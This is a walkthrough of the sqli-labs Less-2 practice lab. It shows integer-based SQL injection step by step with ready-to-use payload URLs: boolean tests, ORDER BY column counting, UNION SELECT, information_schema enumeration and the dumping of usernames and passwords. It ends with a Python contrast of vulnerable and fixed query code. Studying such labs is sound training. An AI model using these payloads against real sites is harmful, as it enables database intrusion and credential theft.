On to the second level, Less-2:
http://127.0.0.1/sqli-labs-master/Less-2/
Visit http://127.0.0.1/sqli-labs-master/Less-2/?id=1
Check whether id is an injection point with a boolean pair (the %23 at the end is a URL-encoded #, which comments out the rest of the query):
and 1=1 returns the normal page:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1%23
and 1=2 returns an empty page:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2%23
The page content follows the truth of our condition, so id is an injection point.
Use ORDER BY n to find the number of columns in the query:
n=3 returns normally:
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 ORDER BY 3%23
n=4 returns an error (MySQL reports Unknown column '4' in 'order clause'):
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 ORDER BY 4%23
So the query returns 3 columns.
Now use UNION SELECT to append a row of our own and find the display positions. Give id a value that matches no row (-1) so that only the UNION row is shown:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select 1,2,3%23
Columns 2 and 3 are echoed on the page, so those are the display positions.
Put version() and database() in those two positions to read the MySQL version (not the PHP version) and the name of the current database.
The current database is security and the MySQL version is 5.5.53.
Next, list the tables in the security database through information_schema:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
The output includes a users table.
List the columns of the users table:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
(Filtering on table_name alone also matches a users table in any other database on the server; add a table_schema='security' condition if the result looks mixed.)
Finally, read username and password. This pulls one row (id 2) per request; a group_concat over both columns in one display position would return every row at once:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 Union Select 1,username,password from users where id=2%23
Done: the injection is complete.
Note: I have modified the source code, so the query statement is displayed when injecting.
Next, look at the source code:
The source code shows that $id is placed into the query without any filtering.
The difference from Less-1 is this line:
$sql = "SELECT * from users WHERE id= $id LIMIT 0,1";
There is no ' around $id: the value is interpolated as a bare integer, so the payload needs no quote to close a string, and quote escaping alone (addslashes or magic quotes) would not stop the injection here.
Apart from dropping the quote from the payloads, the method is the same as Less-1.
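The vulnerable construction beside its fix, as an added example that is not the lab's code: lookup_vulnerable builds the query the way the line above does, and lookup_fixed shows the two-layer repair (integer validation plus a bound parameter). It runs on a constructed in-memory SQLite table; in the lab's PHP the equivalent fix is intval($_GET['id']) together with a mysqli or PDO prepared statement.

```python
import sqlite3

# Constructed sample table for this example (not the lab's real rows).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
""")


def lookup_vulnerable(id_param: str):
    """Same construction as Less-2: the value is interpolated unquoted, so a
    payload needs no quote at all and quote escaping would not help."""
    sql = f"SELECT * FROM users WHERE id={id_param} LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_fixed(id_param: str):
    """Reject anything that is not an integer, then bind the value as a
    parameter so the query text itself can never change."""
    try:
        user_id = int(id_param)
    except ValueError:
        return None
    return conn.execute(
        "SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)
    ).fetchone()


if __name__ == "__main__":
    payload = "-1 UNION SELECT 1, 'x', 'y' -- "
    print("vulnerable:", lookup_vulnerable(payload))   # attacker-chosen row
    print("fixed:     ", lookup_fixed(payload))         # None, payload rejected
    print("fixed, id 2:", lookup_fixed("2"))
```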
Less-3 will be posted as soon as possible.
Sqli-labs-master Less-2: Error Based - Intiger (the lab's own spelling; integer-based)